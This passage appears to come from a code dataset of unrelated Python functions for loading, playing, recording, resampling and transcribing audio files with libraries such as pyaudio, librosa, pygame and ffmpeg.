format=audio.get_format_from_width(ding_wav.getsampwidth()),\n channels=ding_wav.getnchannels(),\n rate=ding_wav.getframerate(), input=False, output=True)\n stream_out.start_stream()\n stream_out.write(ding_data)\n time.sleep(0.2)\n stream_out.stop_stream()\n stream_out.close()\n audio.terminate()", "def load_and_process_audio(self):\n output_vector = None\n doa = None\n if self.model == \"gcc_cnn\":\n output_vector, doa = self.format_gcc_cnn()\n elif self.model == \"gcc_dsp\":\n output_vector, doa = self.format_gcc_dsp()\n elif self.model == \"raw_cnn\":\n output_vector, doa = self.format_raw_audio_cnn()\n elif self.model == \"raw_resnet\":\n output_vector, doa = self.format_raw_audio_cnn()\n else:\n print(\"Error -> No file found\")\n\n return output_vector, doa", "def receive_audio(self):\n print(\"got to receive audio\")\n self.receive_audio_socket = 
self.start_socket(IP, RECEIVE_AUDIO_PORT)\n self.send_chunk(self.my_name.encode(), self.receive_audio_socket)\n print(self.receive_mes(self.receive_audio_socket))\n\n print(\"receive stream made\")\n i = 0\n done = False\n while not done:\n try:\n i += 1\n data = self.receive_audio_socket.recv(CHUNK) # gets audio chunk\n #print(\"got audio chunk number {} of length {}\".format(i, len(data)))\n self.lock.acquire()\n self.voice_stream.write(data) # plays\n self.lock.release()\n # if len(data) == 0:\n # done = True\n #print(\"wrote chunk #{}\".format(i))\n except socket.error as msg:\n print(\"socket failure receive audio: {}\".format(msg))\n done = True\n except KeyboardInterrupt:\n print(\"exception receive audio\")\n done = True\n self.receive_audio_socket.close()\n # stream_receive.close()\n # p_receive.terminate()", "def run(self):\r\n\r\n p = pyaudio.PyAudio()\r\n\r\n stream = p.open(format=p.get_format_from_width(wf.getsampwidth()),\r\n channels=wf.getnchannels(),\r\n rate=wf.getframerate(),\r\n output=True)\r\n\r\n musicdata = wf.readframes(CHUNK)\r\n\r\n while playing:\r\n if self.streamnum == 1:\r\n stream.write(musicdata)\r\n musicdata = wf.readframes(CHUNK)\r\n else:\r\n stream.write(musicdata)\r\n musicdata = wf2.readframes(CHUNK)\r\n if len(musicdata) < CHUNK or musicdata == '':\r\n if self.streamnum == 1:\r\n self.streamnum = 2\r\n else:\r\n self.streamnum = 1\r\n self.next = False\r\n if self.pause:\r\n while True:\r\n if not playing:\r\n return\r\n elif not self.pause:\r\n break\r\n\r\n stream.stop_stream()\r\n stream.close()\r\n\r\n p.terminate()", "def play(self, context=None):\n\n self.nowPlaying = True\n\n # Open file for reading\n wf = wave.open(self.path + '/' + self.name, 'rb')\n p = pyaudio.PyAudio()\n\n # Open stream for playback\n stream = p.open( format = p.get_format_from_width( wf.getsampwidth() ),\n channels = wf.getnchannels(),\n rate = wf.getframerate(), output = True)\n\n # Read file in chunks of 1024 bytes\n data = wf.readframes(1024)\n\n # Read while there is data left to read\n # If nowPlaying is False, user has clicked Stop\n while data != '' and self.nowPlaying:\n stream.write(data)\n data = wf.readframes(1024)\n\n stream.stop_stream()\n stream.close()\n\n p.terminate()\n\n self.nowPlaying = False\n\n # Callback to UI to signal that audio has finished playing\n if context is not None:\n context.stopAudio()", "def load_audio(self):\n df = pd.read_csv(\"{dir}/iteration_{iter}.csv\".format(dir=self.directory, iter=self.iteration),\n usecols=[1, 2, 3])\n\n doa_from_file = df.iloc[0][1]\n wav_name = df.iloc[0][0]\n filename = \"{dir}/{wav_name}\".format(dir=self.directory, wav_name=wav_name)\n\n y, sr = librosa.load(filename, mono=False)\n\n y_8k = librosa.resample(y, sr, 8000)\n result_x = librosa.util.fix_length(y_8k, 8000)\n\n return result_x, doa_from_file", "def play_audio(filename):\n chunk = 1024\n wf = wave.open(filename, 'rb')\n pa = pyaudio.PyAudio()\n stream = pa.open(\n format=pa.get_format_from_width(wf.getsampwidth()),\n channels=wf.getnchannels(),\n rate=wf.getframerate(),\n output=True\n )\n data_stream = wf.readframes(chunk)\n while data_stream:\n stream.write(data_stream)\n data_stream = wf.readframes(chunk)\n stream.close()\n pa.terminate()", "def read_audio(file_path, resample_rate=None, to_mono=False):\n return librosa.load(file_path, sr=resample_rate, mono=to_mono)", "def play_audio(file: str) -> None:\n pygame.mixer.init()\n pygame.mixer.music.load(file)\n pygame.mixer.music.play()\n\n while pygame.mixer.music.get_busy():\n continue", 
"def play(self):\n\n try:\n if self.source is None:\n # If there is no source-file, write the data to a temporary WAV-file ...\n tmpFile = tempfile.NamedTemporaryFile(suffix='.wav', delete=False)\n tmpFile.close()\n self.write_wav(tmpFile.name)\n \n # ... and play that file\n if sys.platform=='win32':\n winsound.PlaySound(tmpFile.name, winsound.SND_FILENAME)\n elif sys.platform == 'darwin':\n cmd = ['afplay', tmpFile.name]\n subprocess.run(cmd)\n else:\n pygame.init()\n pygame.mixer.music.load(tmpFile.name)\n pygame.mixer.music.play()\n time.sleep(self.duration)\n \n # If you want to use FFMPEG instead, use the following commands:\n #cmd = [self.ffmpeg_info.ffplay, '-autoexit', '-nodisp', '-i', tmpFile.name]\n #subprocess.run(cmd)\n \n elif os.path.exists(self.source):\n # If you have a given input file ...\n print('Playing ' + self.source)\n \n # ... then play that one\n if sys.platform == 'win32':\n winsound.PlaySound(str(self.source), winsound.SND_FILENAME)\n elif sys.platform == 'darwin':\n cmd = ['afplay', str(self.source)]\n subprocess.run(cmd)\n else:\n pygame.init()\n pygame.mixer.music.load(self.source)\n pygame.mixer.music.play()\n time.sleep(self.duration)\n \n # If you want to use FFMPEG instead, use the following commands:\n #cmd = [self.ffmpeg_info.ffplay, '-autoexit', '-nodisp', '-i', self.source]\n #subprocess.run(cmd)\n \n except SystemError:\n print('If you don''t have FFMPEG available, you can e.g. use installed audio-files. E.g.:')\n print('import subprocess')\n print('subprocess.run([r\"C:\\Program Files (x86)\\VideoLAN\\VLC\\vlc.exe\", r\"C:\\Music\\14_Streets_of_Philadelphia.mp3\"])')", "def read_audio(self, path_to_wav):\n y, sr = librosa.load(path_to_wav, sr=None)\n return (y, sr)", "def process_files(audio_files, context=[]):\n\n results = []\n bar_limit = len(audio_files)\n client = speech.SpeechClient()\n with Bar('Processing:', max=bar_limit) as bar:\n for audio in audio_files:\n response = convert_speech_to_text(client, audio, context)\n (transcription, confidence) = transcript(response)\n results.append({\n \"path\": audio,\n \"transcription\": transcription,\n \"confidence\": confidence\n })\n bar.next()\n return results", "def inputwav(filename):\n data, sr = sf.read(filename)\n print('Decoding \"'+filename+'\"...')\n print('Sample rate is '+str(sr)+'...')\n try:\n ch=len(data[0,])\n except:\n ch=1\n print('File contains '+str(ch)+' audio channel(s)...')\n #Reshape the data so other functions can interpret the array if mono.\n #basically transposing the data\n if ch==1:\n data=data.reshape(-1,1)\n n=len(data)\n #This prevents log(data) producing nan when data is 0\n data[np.where(data==0)]=0.00001\n #convert to dB\n data_dB=20*np.log10(abs(data))\n return n, data,data_dB,sr, ch", "def loadAudio(self,path):\r\n if self.vid:# Release video to access\r\n self.vid.release()\r\n # Check if has audio\r\n mixer.music.unload()\r\n command = \"ffprobe -i \\\"{0}\\\" -show_streams -select_streams a -loglevel error\".format(path)\r\n result = run(command,stdout=PIPE,stderr=PIPE,universal_newlines=True,shell=True)\r\n if result.stdout.startswith(\"[STREAM]\"):# Contains audio\r\n self.hasAudio = True\r\n else:\r\n self.hasAudio = False\r\n return\r\n print(\"Preparing Audio...\",end=\"\")\r\n filename = \"project_audio.mp3\"\r\n self.aud_path = filename\r\n t_start = time.time()\r\n # Extract audio using ffmpeg, always overwrite\r\n command = \"ffmpeg -y -i \\\"{0}\\\" \\\"{1}\\\"\".format(path,filename)\r\n result = 
run(command,stdout=PIPE,stderr=PIPE,universal_newlines=True,shell=True)\r\n## print(result.stderr)\r\n t_end = time.time()\r\n print(\"Done[{0}]\".format(int(t_end-t_start)))\r\n try:\r\n mixer.music.unload()\r\n mixer.music.load(filename)\r\n except:\r\n print(\"Error Loading Audio\")\r\n self.hasAudio = False\r\n self.vid = cv2.VideoCapture(self.vid_path)# Reload video component\r\n # Launch in GUI Thread\r", "def readAudioData(self, shouldProcess):\n if shouldProcess:\n return gatherData(self.playlists) \n else:\n return pd.read_pickle(\"data/audioDF.pkl\")", "def read_process_song(path, window=1, overlap=0, debug=True):\n\n arr_features = []\n\n signal, sr = librosa.load(path)\n signal = signal[:660000]\n\n # Debug process\n if debug:\n print(\"Reading file: {}\".format(path))\n\n # Split songs:\n samples = split_songs(signal, window, overlap)\n\n # Append the result to the data structure\n for s in samples:\n features = get_features(s, sr)\n arr_features.append(features)\n return arr_features", "def process_file(self, file_name):\n logger.info(f'Recognising speech for {file_name}')\n wf = wave.open(file_name, \"rb\")\n # Check to see if the audio file can be read by the Vosk model\n if wf.getnchannels() != 1 or wf.getsampwidth() != 2 or wf.getcomptype() != \"NONE\":\n raise Exception(f'Invalid file format for {file_name}')\n rec = KaldiRecognizer(self.model, wf.getframerate())\n results = []\n while True:\n data = wf.readframes(config.frame_to_read)\n # If the data we have read is empty then we are at the end of the file\n if len(data) == 0:\n break\n if rec.AcceptWaveform(data):\n result = json.loads(rec.Result())\n # Result can contain an empty text string but no result list\n if len(result['text']) > 0:\n # If we reach here we have accepted the translation of a section of text\n results.extend(result['result'])\n result = json.loads(rec.FinalResult())\n # Add to results list\n if len(result['text']) > 0:\n results.extend(result['result'])\n logger.info(f'Processed speech, captured {len(results)} results')\n return results", "def handle_audio_input(message):\n def build_context(msg: Message):\n ctx = {'client_name': 'mycroft_listener',\n 'source': msg.context.get(\"source\" or \"speech_api\"),\n 'destination': [\"skills\"],\n \"audio_parser_data\": msg.context.get(\"audio_parser_data\"),\n \"client\": msg.context.get(\"client\"), # origin (local, klat, nano, mobile, api)\n \"neon_should_respond\": msg.context.get(\"neon_should_respond\"),\n \"username\": msg.context.get(\"username\"),\n \"timing\": {\"start\": msg.data.get(\"time\"),\n \"transcribed\": time.time()},\n \"ident\": msg.context.get(\"ident\", time.time())\n }\n if msg.context.get(\"klat_data\"):\n ctx[\"klat_data\"] = msg.context(\"klat_data\")\n ctx[\"nick_profiles\"] = msg.context.get(\"nick_profiles\")\n return ctx\n\n ident = message.context.get(\"ident\") or \"neon.audio_input.response\"\n wav_file_path = message.data.get(\"audio_file\")\n lang = message.data.get(\"lang\")\n try:\n _, parser_data, transcriptions = _get_stt_from_file(wav_file_path, lang)\n message.context[\"audio_parser_data\"] = parser_data\n context = build_context(message)\n data = {\n \"utterances\": transcriptions,\n \"lang\": message.data.get(\"lang\", \"en-us\")\n }\n handled = _emit_utterance_to_skills(Message('recognizer_loop:utterance', data, context))\n bus.emit(message.reply(ident, data={\"parser_data\": parser_data,\n \"transcripts\": transcriptions,\n \"skills_recv\": handled}))\n except Exception as e:\n LOG.error(e)\n 
bus.emit(message.reply(ident, data={\"error\": repr(e)}))", "def load_audio(file_path):\n # load the audio file in its original sampling rate\n audio_data, sr = librosa.load(file_path, sr=sampling_rate)\n\n # get the common file name\n file_name = file_path.split(\"/\")[-1]\n file_name = file_name.split(\".wav\")[0]\n\n # calculate number of samples in the time duration needed\n num_samples = int(sr*time_duration)\n\n # get the cut-off audio signals and save them\n for i in np.arange(num_audio_files):\n audio_cut_data = cut_sample(audio_data, num_samples)\n file_path=dir_to_save + file_name + \"_\" + str(i+1) + \".wav\"\n save_sample(audio_cut_data, file_path, sr)\n print(f\"generating signal {str(i)}, its length {len(audio_cut_data)} by cutting the original signal\")", "def read_audiofile(audio_name,cutToLength):\n fs, data = wavfile.read(audio_name)\n # sa.play_buffer(audio_data, num_channels, bydeftes_per_sample,sample_rate)\n #play_obj = sa.play_buffer(data,1,2,fs)\n #play_obj.stop()\n # delete one column. Make mono channel\n if data.shape[1]>1:\n data = numpy.delete(data,1,1)\n #downsample if signal is broad\n if fs>24000:\n data = numpy.delete(data, numpy.s_[::2], 0)\n fs = int(fs/2)\n \n data = data[data!=0]\n data = numpy.delete(data,numpy.s_[ int(cutToLength*fs):len(data)] )\n return data", "def play_audio():\n directory = os.fsencode(MINI_PATH)\n print(directory)\n adp= []\n # lst = os.listdir(directory)\n # lst.sort()\n for file in os.listdir(directory):\n filename = os.fsdecode(file)\n #print(file)\n\n if filename.endswith(\".mp3\"): \n adp.append(MINI_PATH+filename)\n #print(adp)\n adp.sort()\n print(\"ADP: \", adp)\n x = \"|\".join(adp)\n print( f'concat:{x}')\n subprocess.call(['ffmpeg', '-i', f'concat:{x}', '-acodec', 'copy', RESULT_PATH])\n \n for file in os.listdir(directory):\n filename = os.fsdecode(file)\n print(filename)\n if filename.endswith(\".mp3\"):\n os.remove(MINI_PATH+filename)", "def readFile(filename):\r\n speechFile = open(filename, \"r\")\r\n speech = speechFile.read()\r\n speechFile.close()\r\n return speech", "def process_audio_multiprocess(file_paths_arr,\n filt_type, filt_cutoff_freq, filt_order,\n trim_margin_left, trim_margin_right, trim_top_db, trim_window_length, trim_hop_length, trim_ref, trim_preemphasis_strength,\n SAMPLE_RATE=48000, MIN_SAMPLE_RATE=15999, BIT_DEPTH=2,\n ignore_dirs=[\"Noise samples\",\"_Noisy_\",\"_Very Noisy_\"], skip_existing=False,\n in_ext_=None, out_ext=\".wav\", use_tqdm=True, dump_sample_rates=True\n ):\n import soundfile as sf\n import scipy\n from scipy import signal\n \n if dump_sample_rates:\n sample_rates = {} # array of dicts. 
e.g: [{path 0: sample_rate 0}, {path 1: sample_rate 1}, {path 2: sample_rate 2}, ...]\n \n skip = 0\n prev_sr = 0\n iterator = tqdm(file_paths_arr, smoothing=0.0) if use_tqdm else file_paths_arr\n for file_path in iterator: # recursive directory search\n in_ext = in_ext_ if (in_ext_ is not None) else os.path.splitext(os.path.split(file_path)[-1])[-1] # get ext from file_path or use override.\n out_path = file_path.replace(in_ext,out_ext)\n if skip_existing and os.path.exists(out_path):\n continue\n if any([filter_dir in file_path for filter_dir in ignore_dirs]):\n continue\n \n # VCTK cleanup\n #if file_path.endswith(f\"_mic1{in_ext}\"):\n # os.rename(file_path, file_path.replace(f\"_mic1{in_ext}\",in_ext))\n #if file_path.endswith(f\"_mic2{in_ext}\"):\n # continue\n try:\n native_sound, native_SR = sf.read(file_path, always_2d=True)\n except RuntimeError as ex:\n print(f'\"{os.path.split(file_path)[-1]}\" failed to load and has been deleted.\\nDELETED PATH: \"{file_path}\"')\n os.unlink(file_path)\n #raise RuntimeError(ex)\n native_sound = native_sound[:,0]# take first channel (either mono or left audio channel)\n native_sound = np.asfortranarray(native_sound).astype('float64') # and ensure the audio is contiguous\n \n if native_SR < MIN_SAMPLE_RATE: # skip any files with native_SR below the minimum\n continue\n if native_SR != SAMPLE_RATE: # ensure all audio is same Sample Rate\n try:\n sound = librosa.core.resample(native_sound, native_SR, SAMPLE_RATE)\n except ValueError as ex:\n print(ex, file_path, native_SR, len(native_sound), sep=\"\\n\")\n raise ValueError(ex)\n else:\n sound = native_sound\n \n if dump_sample_rates:\n sample_rates[os.path.abspath(out_path)] = native_SR\n \n # 24 bit -> 16 bit, 32 bit -> 16 bit\n if max(np.amax(native_sound), -np.amin(native_sound)) > (2**23): # if samples exceed values possible at 24 bit\n sound = (sound / 2**(31-15))#.astype('int16') # change bit depth from 32 bit to 16 bit\n elif max(np.amax(native_sound), -np.amin(native_sound)) > (2**15): # if samples exceed values possible at 16 bit\n sound = (sound / 2**(23-15))#.astype('int16') # change bit depth from 24 bit to 16 bit\n \n # apply audio filters\n for type_, freq_, order_ in zip(filt_type, filt_cutoff_freq, filt_order): # eg[ ['lp'], [40], [10] ] # i.e [type, freq, strength]\n sos = signal.butter(order_, freq_, type_, fs=SAMPLE_RATE, output='sos') # calcuate filter somethings\n sound = signal.sosfilt(sos, sound) # apply filter\n \n # apply audio trimming\n for i, (margin_left_, margin_right_, top_db_, window_length_, hop_length_, ref_, preemphasis_strength_) in enumerate(zip(trim_margin_left, trim_margin_right, trim_top_db, trim_window_length, trim_hop_length, trim_ref, trim_preemphasis_strength)):\n if preemphasis_strength_:\n sound_filt = librosa.effects.preemphasis(sound, coef=preemphasis_strength_)\n _, index = librosa.effects.trim(sound_filt, top_db=top_db_, frame_length=window_length_, hop_length=hop_length_, ref=ref_) # gonna be a little messed up for different sampling rates\n else:\n _, index = librosa.effects.trim(sound, top_db=top_db_, frame_length=window_length_, hop_length=hop_length_, ref=ref_) # gonna be a little messed up for different sampling rates\n try:\n sound = sound[int(max(index[0]-margin_left_, 0)):int(index[1]+margin_right_)]\n except TypeError:\n print(f'Slice Left:\\n{max(index[0]-margin_left_, 0)}\\nSlice Right:\\n{index[1]+margin_right_}')\n assert len(sound), f\"Audio trimmed to 0 length by pass {i+1}\\nconfig = {[margin_left_, margin_right_, top_db_, 
window_length_, hop_length_, ref_]}\\nFile_Path = '{file_path}'\"\n \n # write updated audio to file\n if os.path.exists(out_path):\n os.unlink(out_path) # using unlink incase the out_path object is a symlink\n sf.write(out_path, sound, SAMPLE_RATE)\n \n if dump_sample_rates:\n return sample_rates", "def load_audio(path):\r\n if path[-4:] == \".wav\":\r\n fs, data = load_wav(path)\r\n\r\n elif path[-4:] == \".mp3\":\r\n fs, data = load_mp3(path)\r\n\r\n else:\r\n raise ValueError(\"Wrong file format, use mp3 or wav\")\r\n\r\n return fs, data", "def stream_file(filename):\n wf = wave.open(filename, 'rb')\n # read in ~100ms chunks\n chunk = int(wf.getframerate() / 10)\n data = wf.readframes(chunk)\n while True:\n try:\n while connected:\n if data != '' and len(data) != 0:\n sio.emit('data', data)\n # sleep for the duration of the audio chunk\n # to mimic real time playback\n sio.sleep(0.1)\n data = wf.readframes(chunk)\n else:\n print('EOF, pausing')\n sio.sleep(0.5)\n wf = wave.open(filename, 'rb')\n data = wf.readframes(chunk)\n print('restarting playback')\n sio.sleep(0.2)\n except socketio.exceptions.ConnectionError as err:\n print('Connection error: %s! Retrying at %s' %\n (err, datetime.utcnow()))\n except KeyboardInterrupt:\n return", "def load_audio(path, target_fs=None):\n y, fs = sf.read(path)\n if y.ndim>1:\n y = np.mean(y, axis=1)\n if target_fs is not None and fs!=target_fs:\n #print('Resampling %d->%d...' %(fs, target_fs))\n y = librosa.resample(y, orig_sr=fs, target_sr=target_fs)\n fs = target_fs\n return y, fs", "def recorder():\n # Following block gets rid of annoying config errors by ALSA\n def py_error_handler(filename, line, function, err, fmt):\n pass\n ERROR_HANDLER_FUNC = CFUNCTYPE(None, c_char_p, c_int, c_char_p, c_int, c_char_p)\n c_error_handler = ERROR_HANDLER_FUNC(py_error_handler)\n asound = cdll.LoadLibrary('libasound.so')\n asound.snd_lib_error_set_handler(c_error_handler) \n\n p = pyaudio.PyAudio()\n stream = p.open(format=FORMAT, channels=1, rate=RATE,\n input=True, output=True,\n frames_per_buffer=CHUNK_SIZE)\n\n yield stream\n\n stream.stop_stream()\n stream.close()\n p.terminate()", "def analyzeWAV(inputFile):\n data, fs, nbits = audiolab.wavread(inputFile)\n samplingRate = fs\n return [data, samplingRate]", "def load_music_files():\n # Make a list of music files, right now it is done by collection all files\n # below the current folder whose extension starts with mp3/wav \n print('Loading music files...')\n for path, dirs, files in os.walk('.'):\n for file_ in files:\n file_path = os.path.relpath(os.path.join(path, file_))\n url_path = os.path.join(*[quote(part) for part in os.path.split(file_path)]) \n ext = os.path.splitext(file_)[1].lower()\n name = os.path.splitext(file_)[0].lower()\n key = ''.join(name.split()) # unique key - no spaces\n audio_file = None\n if ext.startswith('.mp3'):\n audio = MP3(file_path) \n audio_file = AudioFile(url_path, audio.info.length, name, key) \n if audio_file:\n music_files.append(audio_file)\n print('Found:', music_files[-1])", "def load_audio(fhandle: BinaryIO) -> Tuple[np.ndarray, float]:\n audio, sr = librosa.load(fhandle, sr=22050, mono=True)\n return audio, sr", "async def play(self, ctx, *, filename: str):\r\n if not ctx.voice_client:\r\n await self.connect(ctx)\r\n if filename not in self.audio_files:\r\n await ctx.send(\"File {0} not found\".format(filename))\r\n await self.audiofiles(ctx)\r\n else:\r\n ctx.voice_client.play(discord.FFmpegPCMAudio(source=\"{0}{1}.mp3\".format(self.audio_base_dir, 
filename)))\r\n await ctx.message.delete()", "def test_process_mono_file(self):\n test_path = pathlib.Path(__file__).parent.absolute() / 'data/mono.wav'\n self.default_kwargs['input_file'] = test_path\n self.default_kwargs['output_file'] = pathlib.Path(self.temp_file.name)\n self.encoder = FileEncoder(**self.default_kwargs)\n self.encoder.process()", "def load_audio(fhandle: BinaryIO) -> Tuple[np.ndarray, float]:\n return librosa.load(fhandle, sr=44100, mono=True)", "def read(self, path, size, offset, fh, *args, **pargs):\n with self.rwlock:\n if(path in self._open_subtracks):\n real = False\n # Update the last accessed time.\n self._open_subtracks[path]['Last Access'] = time.time()\n # Store the requested offset.\n self._open_subtracks[path]['Positions'][fh] = offset\n else:\n real = True\n if(real):\n # For all non-FLACCue files, just access it normally.\n os.lseek(fh, offset, 0)\n return os.read(fh, size)\n # Wait for the file to finish opening.\n while(True):\n with(self.rwlock):\n self._open_subtracks[path]['Last Access'] = time.time()\n if(self._open_subtracks[path]['Audio'] is not None):\n audio = self._open_subtracks[path]['Audio']\n break\n time.sleep(0.1)\n # Return the data requested.\n if(offset > len(audio)):\n # If we're looking near the end of the file,\n # handle the fact that compression could change the size.\n reported_size = self.getattr(path)['st_size']\n if(offset < reported_size):\n offset = len(audio) - (reported_size - offset)\n return audio[offset:offset+size].tobytes()", "def read( self, song_file_name ):\n song_file = open( song_file_name )\n content = song_file.read()\n return self.split( content )", "def read_audio(ws):\n # Open stream\n global RATE\n p = pyaudio.PyAudio()\n RATE = int(p.get_default_input_device_info()['defaultSampleRate'])\n stream = p.open(format=FORMAT,\n channels=CHANNELS,\n rate=RATE,\n input=True,\n frames_per_buffer=CHUNK)\n\n # Recognize until timeout or recognition\n for i in range(0, int(RATE / CHUNK * RECORD_SECONDS)):\n if not RUNNING:\n break\n data = stream.read(CHUNK)\n ws.send(data, ABNF.OPCODE_BINARY)\n\n print(\"Stopped listening\")\n # Disconnect the audio stream\n stream.stop_stream()\n stream.close()\n # Close the WebSocket\n ws.close()\n # Kill the audio device\n p.terminate()", "def read_write_audio(self):\n\n if (self.local_audio_play and\n (self.mem_player.get_write_available() > self.cfg['Audio']['samples_per_frame'] * 2)):\n # send a frame from input to be played\n data_play = self.local_audio_play.popleft()\n\n if self.audio_playing and isinstance(data_play, Frame):\n if len(data_play) == self.cfg['Audio']['samples_per_frame'] * 2:\n self.last_frame_id = self.mem_player.put_frame(data_play.payload)\n self.cfg['Logging']['session_logger'].rec_write(self.audio_playing, data_play.payload)\n\n elif isinstance(data_play, Command):\n if data_play.parsed['__name__'] == 'utterance_start':\n self.audio_playing = data_play.parsed['fname']\n self.message_queue.append(\n (Command('play_utterance_start(user_id=\"{uid}\",fname=\"{fname}\")'\n .format(uid=data_play.parsed['user_id'], fname=data_play.parsed['fname']),\n 'VoipIO', 'HUB'),\n self.last_frame_id))\n try:\n if data_play.parsed['log'] == \"true\":\n self.cfg['Logging']['session_logger'].rec_start(\"system\", data_play.parsed['fname'])\n except SessionLoggerException as e:\n self.cfg['Logging']['system_logger'].exception(e)\n\n if self.audio_playing and data_play.parsed['__name__'] == 'utterance_end':\n self.audio_playing = None\n self.message_queue.append(\n 
(Command('play_utterance_end(user_id=\"{uid}\",fname=\"{fname})'\n .format(uid=data_play.parsed['user_id'], fname=data_play.parsed['fname']),\n 'VoipIO', 'HUB'),\n self.last_frame_id))\n try:\n if data_play.parsed['log'] == \"true\":\n self.cfg['Logging']['session_logger'].rec_end(data_play.parsed['fname'])\n except SessionLoggerException as e:\n self.cfg['Logging']['system_logger'].exception(e)\n\n if (self.mem_capture.get_read_available() > self.cfg['Audio']['samples_per_frame'] * 2):\n # Get and send recorded data, it must be read at the other end.\n data_rec = self.mem_capture.get_frame()\n\n # send the audio only if the call is connected\n # ignore any audio signal left after the call was disconnected\n if self.audio_recording:\n self.audio_record.send(Frame(data_rec))", "def direct_play(file_name,\n sample_rate = 44100,\n chunk = 1024,\n channel = 1,\n width = 2):\n \n data_file = open(file_name, 'rb', chunk)\n\n # PyAudio instance\n p = pyaudio.PyAudio()\n\n # Open stream\n stream = p.open(format = p.get_format_from_width(width),\n channels = channel,\n rate = sample_rate,\n output = True)\n\n data = data_file.read(chunk)\n\n # Playing the data\n while data != \"\":\n stream.write(data)\n data = data_file.read(chunk)\n\n # Ending things\n stream.stop_stream()\n stream.close()\n p.terminate()", "def load_audio_data(file_path, config):\n pure_path = pathlib.PurePath(file_path)\n audio_seg = pydub.AudioSegment.from_file(pure_path, pure_path.suffix[1:])\n if audio_seg.frame_rate != config.sample_rate_hertz:\n raise ValueError(\"Mismatch in sample rate: expected: %d; got: %d\" % (\n config.sample_rate_hertz, audio_seg.frame_rate))\n if audio_seg.channels != config.audio_channel_count:\n raise ValueError(\n \"Mismatch in audio channel count: expected: %d; got: %d\" % (\n config.audio_channel_count, audio_seg.channels))\n samples = list(audio_seg.get_array_of_samples())\n # NOTE(cais): We currently use LINEAR16 in the stream requests regardless of\n # the original audio file format. 
Is it possible to avoid converting FLAC to\n # LINEAR16 during these cloud requests?\n return struct.pack('<%dh' % len(samples), *samples)", "def play(self):\n assert pyaudio is not None, (\"You need to have pyaudio installed to \"\n \"use the play_wav function\")\n filename = os.path.join(tempfile.gettempdir(),\n '6003_wave_%s.wav' % abs(hash(tuple(self.samples))))\n self.save(filename)\n f = wave.open(filename, 'r')\n try:\n p = pyaudio.PyAudio()\n stream = p.open(format=p.get_format_from_width(f.getsampwidth()),\n channels=f.getnchannels(),\n rate=f.getframerate(),\n output=True)\n\n data = f.readframes(10240)\n while data:\n stream.write(data)\n data = f.readframes(10240)\n\n stream.stop_stream()\n stream.close()\n p.terminate()\n finally:\n f.close()\n os.unlink(filename)", "def decode_audio(fp, fs=None, mono=False, normalize=False, fastwav=False, measured = False):\n if measured:\n fp = fp.decode('latin').replace(\"clean\", \"measured\")\n\n if fastwav:\n # Read with scipy wavread (fast).\n _fs, _wav = wavread(fp)\n if fs is not None and fs != _fs:\n raise NotImplementedError('Fastwav cannot resample audio.')\n if _wav.dtype == np.int16:\n _wav = _wav.astype(np.float32)\n _wav /= 32768.\n elif _wav.dtype == np.float32:\n pass\n else:\n raise NotImplementedError('Fastwav cannot process atypical WAV files.')\n else:\n # TODO: librosa currently optional due to issue with cluster installation\n import librosa\n # Decode with librosa load (slow but supports file formats like mp3).\n _wav, _fs = librosa.core.load(fp, sr=fs, mono=False)\n if _wav.ndim == 2:\n _wav = np.swapaxes(_wav, 0, 1)\n\n assert _wav.dtype == np.float32\n\n # At this point, _wav is np.float32 either [nsamps,] or [nsamps, nch].\n # We want [nsamps, 1, nch] to mimic 2D shape of spectral feats.\n if _wav.ndim == 1:\n nsamps = _wav.shape[0]\n nch = 1\n else:\n nsamps, nch = _wav.shape\n _wav = np.reshape(_wav, [nsamps, 1, nch])\n \n # Average channels if we want monaural audio.\n if mono:\n _wav = np.mean(_wav, 2, keepdims=True)\n\n if normalize:\n _wav /= np.max(np.abs(_wav))\n\n return _wav", "def record():\n p = pyaudio.PyAudio()\n stream = p.open(format=FORMAT, input_device_index=0, channels=1, rate=RATE, input=True, output=True, frames_per_buffer=CHUNK_SIZE)\n num_silent = 0\n snd_started = False\n\n r = array('h')\n while 1:\n snd_data = array('h', stream.read(CHUNK_SIZE, exception_on_overflow = False))\n if byteorder == 'big':\n snd_data.byteswap()\n r.extend(snd_data)\n\n silent = is_silent(snd_data)\n if silent and snd_started:\n num_silent += 1\n elif not silent and not snd_started:\n print(\"Sound started.\")\n snd_started = True\n\n if snd_started and num_silent> 10:\n break\n\n sample_width = p.get_sample_size(FORMAT)\n stream.stop_stream()\n stream.close()\n p.terminate()\n\n r = normalize(r)\n #r = trim(r)\n #r = add_silence(r, 0.5)\n return sample_width, r", "def load_audio(fhandle: BinaryIO) -> Tuple[np.ndarray, float]:\n return librosa.load(fhandle, sr=None, mono=True)", "def play_audio(filename):\n os.system(AUDIOPLAYER + ' ' + filename)", "def read_wav_file(wave_file):\n return wavfile.read(wave_file)", "def do_play(*_args):\n print(last_wav_path)\n if last_wav_path and last_wav_path.is_file():\n threading.Thread(\n target=lambda: subprocess.check_call(\n [\"aplay\", \"-q\", str(last_wav_path)]\n )\n ).start()", "def get_audio(filepath, restrict=restrict_range, use_librosa=False, normalize=True):\n try:\n audio, fs = librosa.load(path=filepath, sr=22050)\n except Exception as e:\n fs, audio_ro = 
scipy.io.wavfile.read(filepath)\n audio = np.copy(audio_ro) / 32767\n if fs != 22050:\n print(\"incorrect fs\")\n return None\n # frame-wise calculation\n if restrict:\n start = start_sec * fs\n end = end_sec * fs\n audio = np.array(audio[start:end], dtype=np.float32)\n if normalize is True:\n audio = (cqt_params['normalizing_constant'] * audio) / np.std(audio[np.abs(audio > 0.00001)])\n return audio", "def load_audio_files(path, single_bar=True):\n\n audios = []\n\n for file_root, dirs, files in os.walk(path):\n for name in files:\n # be careful not to get stuck in wrong files like .DS_Store\n if not re.match(r'.*wav', name):\n continue\n name = os.path.join(file_root, name)\n data, sr = sf.read(name)\n assert sr == 44100\n\n if len(data.shape) == 2 and data.shape[1] == 2:\n data = 0.5 * (data[:, 0] + data[:, 1])\n\n # We only use the 2nd bar out of 4\n if single_bar:\n if data.shape[0] >= 4*44100:\n data = data[2*44100:4*44100]\n else:\n data = data[:2*44100]\n\n data = data.astype(np.float32)\n data = torch.from_numpy(data).unsqueeze(dim=0)\n audios.append(data)\n\n return audios", "async def audiofiles(self, ctx):\r\n files = '\"{0}\"'.format('\", \"'.join(self.audio_files))\r\n await ctx.send(\"```Available audio files :\\n{0}```\".format(files))", "def get_audio(path):\n return send_from_directory('audio', path)", "def record_audio(self):\n stream = self.audio.open(format=DEFAULT_FORMAT,\n channels=DEFAULT_CHANNELS,\n rate=DEFAULT_RATE,\n input=True,\n frames_per_buffer=DEFAULT_CHUNK_SIZE)\n\n 